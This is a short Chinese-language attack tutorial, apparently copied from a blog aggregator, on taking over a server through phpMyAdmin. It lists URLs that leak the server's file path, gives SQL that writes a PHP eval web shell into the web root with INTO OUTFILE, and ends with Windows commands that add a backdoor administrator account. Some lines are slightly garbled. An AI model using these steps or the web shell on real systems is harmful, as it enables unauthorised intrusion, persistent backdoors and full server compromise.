利用phpMyAdmin提權

利用phpMyAdmin提權

爆路徑

  • /phpmyadmin/libraries/lect_lang.lib.php
  • /phpMyAdmin/index.php?lang[]=1
  • /phpMyAdmin/phpinfo.php
  • /load_file()
  • /phpmyadmin/themes/darkblue_orange/layout.inc.php
  • /phpmyadmin/libraries/select_lang.lib.php
  • /phpmyadmin/libraries/lect_lang.lib.php
  • /phpmyadmin/libraries/mcrypt.lib.php

獲得物理路徑 C:\wamp\www\phpmyadmin\themes\darkblue_orange\layout.inc.phpphp

寫馬

1
2
3
4
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES("<?php eval($_POST[Cknife]);?>");
select cmd from a into outfile "C:/wamp/www/phpmyadmin/d.php";
Drop TABLE IF EXISTS a;

得到webshell

最後用Cknife鏈接,建立賬戶並添加到管理員用戶組
net user admin admin /add
net localgroup administrator admin /addweb

相關文章
相關標籤/搜索